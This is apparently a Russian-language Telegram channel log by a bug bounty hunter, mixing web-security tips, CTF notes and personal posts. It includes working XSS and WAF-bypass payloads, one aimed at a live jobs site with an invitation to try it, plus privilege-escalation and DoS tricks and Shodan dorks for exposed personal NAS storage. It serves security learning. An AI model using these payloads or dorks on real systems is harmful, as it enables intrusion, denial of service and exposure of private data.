#xss #tips #tutorial

Объяснение вчерашнего челенжа от intigriti (challenge.intigriti.io/3/)
Итак, у нас дана страница

https://challenge.intigriti.io/3/

Нам необходимо вытащить PHPSESSID.
Мой PoC получился вот таким:

https://challenge.intigriti.io/3/?--><details/open/ontoggle=confirm(document.body.innerHTML.substr(document.body.innerHTML.lastIndexOf('=')+1,33))>

Но перейдя по данной ссылке вы ничего не увидите. Для того, чтоб xss сработала, страницу необходимо скачать и открыть заново.
Почему так:
после сохранения хром добавляет комментарий в начале

<!-- saved from url=(0150)https://challenge.intigriti.io/3/-%2D%3E%3Csvg/onload=alert(document.body.innerHTML.substr(document.body.innerHTML.lastIndexOf('PHPSESSID')+10,32))%3E -->

Так как данные берутся от Request-URI, спец символы такие как "> кодируются %22%3E

А из-за того что у нас исходник копируется в переменную source, а после декодируется через decodeURIComponent и записывается в body

var source = new XMLSerializer().serializeToString(document);
document.body.innerHTML = decodeURIComponent(source);

наш комментарий станет

<!-- saved from url=(0150)https://challenge.intigriti.io/3/--><svg onload="alert(document.body.innerHTML.substr(document.body.innerHTML.lastIndexOf('PHPSESSID')+10,32))">

p.s.
поеду кусок мяса на природе зажарю в честь первого сентября) пишите кому что не понятно, вечером отмечу!

xss challenge решен верно)

#tips

Небольшой совет:
при ресерчинге уязвимостей, обращайте внимание на параметр role при отправке пакета с регистрационными данными.
Порой он передается с этим пакетом и если так, то его можно изменить в свою пользу.
Он может быть к примеру таким:
role = user
role = admin
role = root
role = administrator
Пробуйте разные варианты. Иногда, регистрируя юзера можно получить админские права)

P.S.
В чате (@api_00) подкинули статейку, в который как раз человек использует совет выше. Играйте с параметрами как позволяет ваша фантазия! Статья интересна к прочтению, поэтому держите))

https://medium.com/@tarekmohamed_20773/add-new-user-with-admin-permission-and-takeover-the-organization-6318ee10154a

В старбаксе опен "редитект" на ночь глядя нашелся. Настолько на ночь глядя, что аж слово попутал)) Все по классике! Два слеша и погнали в гугл)

Мне аж латте макиато захотелось))

P.S.
эх( не налили мне латте.. осталась селф

Нус, давайте поиграемся тогда.
Вот поддомен, на котором есть хсс:
loadglobalassets.starbucks.com
Непосредственно ссылку на уязвимую страницу выложу как хинт изменением в этом же посте через 30 минут.
ХСС СЕЛФ!

Хинт:
А его и нема. Есть человек, который ее уже нашел и сделал это на поддомене выше. Я же нашел уязвимость на

https://loadglobalassets.starbucks.com/inexistent_file_name.inexistent0123450987.cfm

Поэтому можно искать как на поддомене, так и по ссылке.

Никто уже не решает, как я понял)
А селфочка была легкая. Просто добавьте

<script>alert('Subscribe to t.me/api_0)</script>

в User-agent, перехватив запрос и отправьте на исполнение.
В ответ вы увидите на странице свой алерт)

Бывает же! Прямо на основном домене приватки!)

#xss #tips

Пейлоад, который был использован выше, для воспроизведения хсс.
В связи с тем, что она оказалась дублём, то выкладываю сюда:

https://www.accentjobs.be/nl/candidates/jobs/m/%3B%20%27style=position:fixed;top:0;left:0;font-size:999px%20onmouseover%3D'alert%28%22Subscribe%20to%20t.me/api_0%22%29%27

Спрашивается и зачем я так извращался? А затем, что после того, как мы закрыли кавычкой и уголковой скобкой тег meta, любые мои теги вырезались их waf-ом. Поэтому пришлось изобретать что-то интереснее. И так, как выход из тега происходил, то воспроизвести хсс это было лишь делом обфускации и обхода waf.
Мейби и сейчас воспроизводится. Попробуйте (не в хроме и не в я.браузере)

Предлагаю вам поиграться в picoCTF. Из года в год они делают хорошие задания и все платформы оставляют открытыми, поэтому вы сейчас можете так же посмотреть, решить и проверить задания предыдущего года.
А вот на этот год:

https://2019game.picoctf.com/

Удаляю канал завтра в это же время.
Если какая-то инфа отсуда нужна, делайте бекап.
Чат (@api_0) оставлю для общения.
Всегда рад вашим вопросам в лс (@areafishing).

#backup прошлой версии канала

#article

FAQ по часто задаваемым

https://telegra.ph/FAQ-09-26-2

Также #backup канала в веб версии:

https://hadariel.pp.ua/ethical-hacking/

https://youtu.be/y-KsMgswEuk

#tips

Еще один ресурс по поиску поддоменов. Довольно быстрый, по сравнению с suip.biz, но находит поменьше поддоменов.

https://api.hackertarget.com/hostsearch/?q=нужный_вам_домен

Какие-то испанские админы при добавлении юзера в сеть случайно скопировали строку ниже и добавили пользователя "Se ha completado el comando correctamente", что в переводе с испанского звучит как "команда была выполнена успешно" 😂

#hackthebox

Наконец-то, спустя неделю я взял хотя бы юзера.. Я конечно знал что мои знания далеки до идеала, но таким ущербным, каким меня выставляет hackthebox, я себя еще никогда не чувствовал)

UPD:
Если кто будет решать и застопорится, добро пожаловать в лс!

Добрался таки до рута на Jarvis (hackthebox.eu). Большое спасибо за линк этому товарищу @st1t4)

#tips

Если вам нужен сервер, который перезагружается после каждого запроса, то его можно поднять с помощью netcat вот так:

while :; do (echo -ne "HTTP/1.1 200 OK\r\nContent-Length: $(wc -c <index.html)\r\n\r\n"; cat index.html) | nc -l -p 8080; done

#git #tips

Помощь в поиске cve:
https://github.com/andreafioraldi/cve_searchsploit

#tips #XSS #Bypass

Нашел приятный waf bypass for xss

<svg onauxclick='a=alert;b=document;a(b.domain)'>

#git #tips

PhoneSploit - взлом Android устройств с ip адресами:

https://github.com/metachar/PhoneSploit

#XSS #tips

Доброе утро!
Небольшой банальный совет, которым я сам раньше пренебрегал - пробуйте воспроизвести дыру в разных браузерах с включенными и выключенными аудиторами.

#python #tips

Я периодически сталкиваюсь с тем, что есть необходимость поработать над большим проектом и написать что-то на python. И для красоты скрипта, для удобства его работы, построения качественной логики и тд и тп, мне приходится использовать объектно-ориентированное программирование. Но есть у меня такая большая проблема того, что я поооостоянно забываю принципы работы классов, методов и тому подобное. Приходится каждый раз как заново это все проходить. И я обращаюсь постоянно к одному и тому же источнику. Не как реклама, а как совет и один из источников откуда информацию черпаю: https://www.youtube.com/watch?v=dAbP_ItUVlI
Канал для начинающих и товарищ расписывает как боженька. Это можно увидеть посмотрев видос выше. Даже если вы ни одного яп не знаете, мне кажется, посмотрев видос, вы поймете как работает ооп в пайтоне😄

Довольно интересная #cve

https://blog.trendmicro.com/trendlabs-security-intelligence/cve-2019-0725-an-analysis-of-its-exploitability/

#git #tips

Библия пентестинга:

https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE

#tips

Открыл для себя удобный сайтишко для работы с доменами, поддоменами и иже с ними.
Сам сайт: urlscan.io

Апи сайта: https://urlscan.io/api/v1/search/?q=domain:example.com

#tips

Если вы обнаружили торчащий в сеть GraphQL, но он не отдает никаких данных (отвечает на запросы, но сам по себе пуст), то попробуйте сделать огромное количество вложенных запросов. Это может вызвать DOS сервиса.

#tips

Недавно закончил читать книгу "A bug hunter's diary" под авторством Tobias Klein и теперь могу ее посоветовать вам! Она не особо популярна, почему-то, но ее стоит прочесть, поверьте! Она открыла мне глаза на многие вещи!

#tips

Открыл для себя вот такую вот памятку по nmap. Думаю, что и вам она окажется полезна!

#tips

Думал стоит ли это писать или нет и решил что стоит, потому что канал то задуман был как заметки о том, что я нового узнаю и чего достигаю. А следующая вещь, какой бы она основополагающей не являлась, но мне была неизвестна до сегодняшнего дня.

Не думали никогда что nmap может работать быстрее с привелегиями root, нежели без них? Это так. Происходит это потому что на уровне общения сетевой модели TCP/IP при трехстороннем рукопожатии если вы отправляете SYN на сервер, в ответ получаете SYN+ACK, то обратно на сервер так же должен улететь ACK и при этом происходит соединение для общения клиент сервер. Но есть такое понятие как сырые пакеты (raw пакеты или сокеты). Их отправлять может только операционная система (то бишь рут). И когда в ответе SYN+ACK от сервера нам приходит подтверждение что наш сырой пакет был доставлен при первом рукопожатии, клиент (мы) можем не завершая соединение подтвердить наличие того или иного порта, так как нам пришел с него ответ.

Прошу поправить, если где-то ошибся @api_00

#tips

PortSwigger радует хорошими tips-ами:

тык на твит

#tips

Алиса Шевченко (кто не знает ее - вот она) в своем твиттере написала, что начинает вести заметочки Research Notes, посвященные внутренним системам, обнаружению уязвимостей и разработке эксплоитов.
Наверное с меня пример взяла 😂 (шутка)

тык - попал на Research Notes

тык - попал на твит

#tips #xss

Для тех кто еще не разобрался или хочет пополнить копилку своих знаний в xss, рекомендую глянуть данное видео (если лень час смотреть - ускоряцте вдвое. Достаточно слушабельно на х2).

XSS

P.S.
Доклад на русском, кому это критично)

#git #tips

Пейлоады для burpsuite intruder:

https://github.com/1N3/IntruderPayloads

#tips #sqli

Туториал по скулям и список пейлоадов, если вдруг кто забыл:

https://medium.com/@ismailtasdelen/sql-injection-payload-list-b97656cfd66b

Быть может кто не знает о данной площадке:
pwnable.tw
Отличная скиловальня на равных в хтб!

#xss

Как же давно не находилось ничего((

#IDOR #tutorial

Итак IDOR (далее и везде - айдор). Расшифровывается эта аббревиатура как Insecure Direct Object Reference, что в переводе обозначает "небезопасная прямая ссылка на объект". Из названия мы можем понять, что данная уязвимость даёт нам возможность исполнять различные функции из-за контроля доступа. Это на самом деле оочень лёгкая уязвимость как в понимании, так и в поиске и уж тем более в эксплуатации. Но нельзя недооценивать последствий, которые могут быть в случае ее эксплуатации.
Давайте представим, что мы зарегестрировались на странице какого-то чата и перейдя на страницу сообщений мы видим ссылку такого формата:
https://example.com/messages?user_id=tvoi_id
В данном url можно заметить параметр, который указывает на твою идентефикацию, для того, чтоб сервер отдал в ответе переписку именно для твоего аккаунта. Но что будет если мы имеем на этом сайте уязвимость айдор и попробуем немного видоизменить url:
https://example.com/messages?user_id=admin_id
В данном случае мы подставили айди администратора и, если контроля доступа на сервера не производится, то в ответ мы получим администраторские переписки.
С принципом такого рода дыры разобрались. Посмотрим, где может она находиться и как можно найти ее.
Из-за того, что developer-ы довольно часто делают ошибки (все мы люди, все мы человеки), и оставляют многие функции без контроля доступа. Так же данный вид уязвимости довольно тяжело проверить сканером. Поэтому эта уязвимость по сей день имеет актуальность. Самое банальное что приходит на ум - проверить ссылку смены пароля на наличие данной уязвимости. Да, там до сих пор в некоторых программах багбаунти она "стреляет".
При поиске данной уязвимости я пропускаю трафик через burpsuite и свободно изучаю функционал сервиса, после чего просматриваю историю запросов в burp. При передаче POST запроса практически при любом действии передаются идентефикаторы вашего аккаунта. И довольно часто он. Закодированы или захешированы. Представьте, что в POST передается параметр с таким значением:
user_id=e48e13207341b6bffb7fb1622282247b
и вы сразу же понимаете, что этот параметр предугадать для другого пользователя невозможно. Но стоит попытаться расшифровать это значение. Возможно там используется общедоступное шифрование. В данном случае я закодировал с помощью md5 значение 1337. Создайте два аккаунта и, посмотрев какой идентефикатор у второго аккаунта, попробуйте предугадать или расшифровать закономерность генерации данных id.
Просмотрите абсолютно все запросы и ответы, прежде чем приступать к поиску айдор, потому что есть возможно где-то на конечных точках есть возможность получать идентефикаторы в response, в соответствии с нужным нам запросом и в последующем использовать их для применения айдор в различных местах сервиса.
Попробуйте передать нескольно значений для параметра user_id в одном запросе. Приложение может быть не готово к такому, что тоже приведет к айдор. Пробуйте изменять типа request-а. Например вместо POST отправлять PUT и тд.
Ещё один совет, который относится по большому счету к ресёрчинну любой уязвимости - прежде чем отправлять измененный request, посмотрите, что отвечает вам сервер на получение оригинального. Это очень помогает в поиске аномалий.
Пожалуй, это все, что я хотел рассказать (возможно, пока что) про IDOR. Если кому-то все еще непонятна эта дыра - спрашивайте в лс (@areafishing) или в чате канала (@api_00).

Просто фоточка нрайца)

#tips

Открыл для себя этот канал вчера. Для тех, кому не достаточно текстовой информации по реализации уязвимостей - стоит заглянуть сюда.

#tips from @onlinedev

Расширение для браузера, показывает используемые технологии и иногда детектит конкретные версии (фреймворки, cms, reverse proxy и тд). https://www.wappalyzer.com/

Итак, что мы имеем на данный момент?
В python 3.8 оператор присваивания в if и while можно использовать как ":=" (двоеточие равно).
К примеру если раньше это выглядело так:

buf = inputfile.read(bufsize) while buf:
outputfile.write(buf)
buf = inputfile.read(bufsize)

то теперь это будет выглядеть так:

while buf := inputfile.read(bufsize):
outputfile.write(buf)

Выглядит конечно компактно и красиво, но.. пайтон, имхо, уже не тот.
Я снимаю шляпу и крепко держусь за v2.7
Всем хорошего вечера!)

Наверное #tips

Не забывайте проверять 9200 порт Elasticsearch. Там порой может быть много интересного.

При сканировании дирректорий может произойти такая ситуация:
/api/admin -> 403
/api/admin.json -> 200
Пробуйте всегда добавлять .json Возможно респонс вернётся интереснее чем вы ожидаете.

Очень забавная ситуация с базой данный firebase от гугла. Если вы попробуете прогуглить дорк
site:.firebaseio.com
именно в гугле, то ничего необычного вы не найдете. Но если вы попробуете прочекать этот же дорк к примеру в поисковике bing, то получите кучу инфы с урлов оканчивающихся на .json
И гугл знает о данном IDOR (думаю, ее можно так назвать), ведь из своей выдачи данные результаты они убирают. Почему они не закрывают эту проблему, мне неизвестно пока.

#article

Статья показалась мне интересной

Тык на medium

Дорк для Shodan из приват канала:

"Set-Cookie: iomega=" -"manage/login.html" -http.title:"Log In"
Запрос,который позволяет прошарить NAS хранилища (документы, медиа файлы, личные архивы, бэкапы компьютера, телефона)

Вот не полный список подобных хранилищ:

Redirecting sencha port:9000
"Server: Logitech Media Server" "200 OK"
"X-Plex-Protocol" "200 OK" port:32400
"CherryPy/5.1.0" "/home"
Redirecting sencha port:9000
"Set-Cookie: iomega=" -"manage/login.html" -http.title:"Log In"

#xss

Решил глянуть что там у подписчика из чата раскрутить не получается. Надо было немножко докрутить пейлоад и все было бы хорошо)

Поздравляю с новым 2020 годом вас, дорогие подписчики!

У меня он наступил только что, поэтому сейчас я вас и поздравляю.
Хотелось бы подвести небольшой итог своей продуктивности и работе в этом году, но итоги нужно подводить когда ты хоть сколько-нибудь продуктивен и работал 😁.
Но на самом деле, я спрогрессировал в этом году, относительно того, каким я был год назад, ведь заниматься в сфере пентеста и багбаунти я как раз таки начал в ноябре 2018 года. И не смотря на то, что я не достиг еще каких-то невероятных высот и знаний в этой сфере, я приобрел отличных товарищей и коллег, если я могу считать себя коллегой в этом деле. Год назад я говорил, что променял бы все на знания, но сейчас понимаю, что знания то рано или поздно придут, а вот людей заиметь сложно.
Хотелось бы пожелать вам в новом году, да и жизни в целом, помимо здоровья, счастья и всей этой банальщины, еще и быть продуктивными и успешными, набрать огромный багаж знаний и знакомств, ну и конечно исполнить в этом году одну из своих мечт, но не главную мечту, а то жить скучно станет)
Всех обнял!)

П.С.
Если ты это читаешь, то, скорее всего я уже сплю, поэтому в лс могу не ответить

#tips

У моего друга есть канал с его небольшими записочками, по типу моего. Думаю, там вы тоже что-то сможете для себя найти интересное. Держите:
https://t.me/pigPeter
А так же он периодически ведет медиум, который интересно почитать. Наверняка многие видели его статьи. Правда пишет он их на amerikanck0m, поэтому для кого это проблема - можете переходить туда, параллельно открывая переводчик)
https://medium.com/@valeriyshevchenko/

Поговаривают, что вкантакти удалят в следующий понедельник. Сейчас были учения по быстрому удалению вк.

Ну что, запускаю и я CTF со своими товарищами)

Как вот бб заниматься, когда 24/7 люди сканят, а потом то, что я руками нахожу - получает дубль?! Обидно вообще-то.

Ну и еще одно детище моей команды намечается на 8-9 числа. Если тут есть Воронежские, то добро пожаловать, так как соревнования будут проходить очно.

Мне казалось это очевидным. Для тех, кто не подписан на кавычку или webpwn и кто не знал об этой фиче - репостну ка её сюда.

Ох давненько ничего подобного не находилось. Аж приятно)

Приятный бонус под вечер.
Люблю мыло! Еще не фикс, а уже поблагодарили)

#tips

Нашел в твитаче статейку годную, по типсам для апи. Там же в дополнение шел гит со всеми типсами.
Последняя моя скуля была на поддомене в мыле, который отдает 403 Forbidden. И все очень удивляются тому, что я там нашел скулю. Почему нет? Как раз таки на api и найдена была уязвимость, не смотря на то, что сайт не дает вам доступ ни к чему. В связи с этим очень советую почитать:
это
и посмотреть хотя бы, если не добавить себе в закладки:
это

Тоже периодически ищу подобные читщиты именно по шодану. Этот оказался, при беглом просмотре, более чем полным.

#tips

Думаю многим, из тех, кто еще не влился в бб и не нашел свои заветные баги, поможет эта статья:

https://medium.com/hackernoon/10-rules-of-bug-bounty-65082473ab8c

Решил я посмотреть такую контору как AT&T. Пришел к выводу, что если вы триажер и ищете отмазки как не платить и не закрывать баги в своей конторе - смело спросите h1 стафов и AT&T стафов. Они умеют придумывать невероятно крутые отмазы.
Спонсор сегодняшних мемов - AT&T.
«AT&T - селфклоузни скулю. Импакта нет.»

#tips

Кстати, не знаю почему раньше не кидал этот ресурс, но как по мне - очень крутой ресурс в частности для понимания общения client-server и в принципе Web разработки.
тык)

OK такое не принимает, поэтому играйтесь. Может что-то придумаете прикольное.


http://ads.ok.ru/dk?cmd=logExternal&st.cmd=logExternal&st.link=https://google.com&st.name=accessibleVersion&st.sig=4afzua545MjWn4XFJnAmqdeghoTFKUeouM-UVxOdbLg

https://youtu.be/ZOgvMZHnsjE

https://www.amolbaikar.com/facebook-oauth-framework-vulnerability/

https://youtu.be/cGi4opljR-4

Хороший сказ о баг-баунти для самых маленьких. Если кратко, то не всем оно нужно. Не все могут правильно работать с репортами. И уж точно не все на основе репорта начинают анализировать инфраструктуру на предмет повторения проблемы в других местах.

Это тоже должно быть просмотрено.

С 8 марта!!!

Всех девчуль этого канала считаю должным поздравить с сегодняшним праздничком!) Вы самое светлое, красивое и нежное что у нас есть. А если вы на этом канале, то вы еще и самое умное, что у нас есть 😁!))
Спасибо за то, что заставляете нас улыбаться просто глядя на вас. Мы, мальчики, парни и мужчины, очень любим и ценим всех вас, при чем всегда, а не только сегодня!))

#tips #tutorial

A hacker's life собрали статейки, которые все мы когда-то читали, но уже, скорее всего, забыли. Я решил восстановить их в памяти и перечитал все заново, что и вам советую:

• Static Analysis of Client-Side JavaScript for pen testers and bug bounty hunters

• Bug Bounty — Tips / Tricks / JS (JavaScript Files)

• Web Application Security & Bug Bounty (Methodology, Reconnaissance, Vulnerabilities, Reporting)

• Bug Bounty — The Learning Mindset

• BUG BOUNTY CHECK LIST BY C1

• Сказ Сергея Кашатова опикселе, который крадет данные (без названия)

• Bug Bounty Hunting Tips #1— Always read the source code

• Сookie-based XSS exploitation | $2300 Bug Bounty story

• How to find internal subdomains? YQL, Yahoo! and bug bounty.

• Bug Bounty Hunting Tips #3 — Kicking S3 Buckets

Полезная штука для тех кто любит client side атаки. XSS Cheat Sheet 2020

#tips от подписчика:

Если при проверке хсс фильтрация не дает вставить пейлоад, то попробуйте отправлять его по одному символу. Возможно так получится, так сказать, прогреть фильтры и пейлоад зайдет.

"Пару раз встречал байпас фильтрации, если посылать пейлоад по одному символу в каждом запросе

param=asd"
param=asd">
param=asd"><s
param=asd"><sc
param=asd"><scr
...
и т.д."

#tips

• Если вы нашли параметр «limit» (/page?limit=10), вы можете попытаться изменить его на длинное значение, например (/page?limit=9999999999999). Это может привести к DoS атаке.

• Когда вы тестируете SSRF, попробуйте изменить HTTP / 1.1 на HTTP / 0.9 и удалить заголовок хоста (чтобы обойти некоторые исправления и проверки)

• Для поиска абсолютно всех доменов и контор, которые держит одна компания можно использовать «Copy Right Singture» в дорках google (intext:"© 1999–2020 Mail.ru Group")

• Извлечение поддоменов в диапазоне айпи адресов с помощью nmap-а
nmap IP_range_sn | grep "domain" | awk'{print $5}'

P.S.
Если что-то непонятно в вышеописанном, да и вообще что-то непонятно - добро пожаловать в чат @api_00 или ко мне в лс @areafishing

Good bounty)) Но гитхаб не дисклоузит отчеты, как они написали в комментарии к репорту. Только у них на сайте((

Много кто спрашивал, какую методологию поиска багов я использую. Ответ всегда одинаков - "никакую". Это действительно так. Я просто ищу за что зацепится глаз. И это неправильно. Пора систематизировать поиск и в попробую воспользоваться подобным материалом:

Не по теме канала, но это достойно внимания многих подписчиков.
Когда я только начинал деятельность в багбаунти, эта деятельность зарождалась в h1 chat в вк, в который меня инвайтнули просто так. Вот просто взяли и инвайтнули. Туда не попадают просто так. 90% людей которые там есть - это либо багхантеры, либо разрабы и админы некоторых платформ, таких как тот же вк. Я тогда осознавал что я не должен там находиться, потому что я никто. Но мне дико хотелось научиться находить реальные уязвимости, а не решать CTF таски.
Потом, через пол года, я решил завести свой канал (нет, не этот, а прошлый, который удалил. Вот его бэкап). Эта идея казалась мне безумной и провальной, потому что имея малые знания в этой сфере, я ничего не мог дать людям. Но я решил его создать, так как всегда найдутся те, кто знает еще меньше и кому мой опыт будет полезен. Я до сих пор считаю, что этот канал сам по себе бесполезен, но продолжаю его вести только потому что люди отсуда могут узнать у меня о чем-то новом, а сам я, когда что-то рассказываю, узнаю в этой тематике намного больше и разбираюсь досконально.
В феврале этого года я провел свой CTF с товарищами. Сама по себе задумка его проведения мне казалась безумной, потому что я считаю что не обладаю теми знаниями, чтоб давать людям что-то решать. Но я рискнул вывести его на мировой уровень и на него зарегистрировалось 900+ команд.
Все эти баги и уязвимости которые я нахожу - находятся сами собой, случайно.
И каждой заслуги, которая у меня сейчас есть, я считаю себя недостойным. Изо дня в день я чувствую этот "синдром самозванца" (спасибо Валере Шевченко за предоставленный правильный термин этого явления).
И я уверен, что на жтом канале я не один такой. Для нас, для людей с таким синдромом, посвящается этот видосик:
https://youtu.be/ucFQLVuxwUA

Вчера по ошибке, приняв за спам, удалил сообщение подписчика в чате. Оказалось, что годный курс он вбросил. Вброшу снова, может кто не видел:

«Cалют хацкеры !!! @thecybermentor (твиттер) из-за Коронавируса раздает свой курс бесплатно. Купон STAYINSIDEANDLEARN https://www.udemy.com/course/practical-ethical-hacking . И это не первоапрельская шутка. 1 апреля можно ввести купон и получить халяву.» (с) @VolgaSmart

#tips

Годная для прочтения статейка на amerikansk0m. Советую прочесть как bugbountytips.

Тык

Для тех, кто не понимает или по каким-то причинам не хочет читать/слушать Андрея Созыкина, но очень хочет разобраться с нейросетями и начать их писать на Python, то стоит почитать статьи/учебник Петра Редько. Мне он показался наиболее понятным, нежели все, что я читал когда начинал работать с нейросетями.

Первая глава - тык.

@denstr решил проблемку с загрузкой хостов в акунетикс (ограничение на 500 хостов за раз), для тех кто мучался - вот решение:
https://gist.github.com/denstr37/06e4eb5b84ba01c5eb8b5816e05d8681
вставить свои апи_кей и урл
запуск следующим образом:
./scan_acunetix.py --file /tmp/list_urls --group superbounty_program
python2.7

#xss #bypass

Мой хороший друг Богдан твитнул новый байпас для cf. И правда довольно странно что он не тригерит на большие буквы:

New Cloudflare XSS Bypass:

<svg/OnLoad="`${prompt``}`">

Proof: тык

A strange new solution from Cloudflare engineers. WAF will be weakened if DOM event has uppercase.

Товарищ тут зачинает свой канал. Думаю там будет что-то интересное. Не как реклама этого канала, а как заметку оставлю ссылочку, чтоб мониторить его)

@pc_for_all

Обход Bitrix WAF от @r0hack.
Казалось бы все банально просто и очевидно, но видимо нет, раз такие баги все еще довольно часто встречаются в рамках одной программы.

Ссылочка на пост

Если что непонятно - снизу есть кнопочка «обсудить», либо же залетайте сразу в @api_00

На канале https://t.me/pentester3ffect выкладывают бесплатные курсы с Udemy. Думаю будет полезно.

Так же, подписчик написал тулзу которая достает URLs, Paths из APK файлов: https://github.com/ndelphit/apkurlgrep

Если потребуются доработки или найдутся баги - писать сюда: @ndelphit

Заметки от @luniela:

Достаточно крутые заметки, которые я залил в github gist для удобства. Там есть куча интересного что может облегчить вам жизнь.

Ссылочка - тык.

Ништячки прилетают с репортов, о которых давным давно забыл 😁

#tips

Довольно интересную методичку для себя нашел. Мейби вам не в новинку, но все же держите!

P.S.
ни слова про баян 😠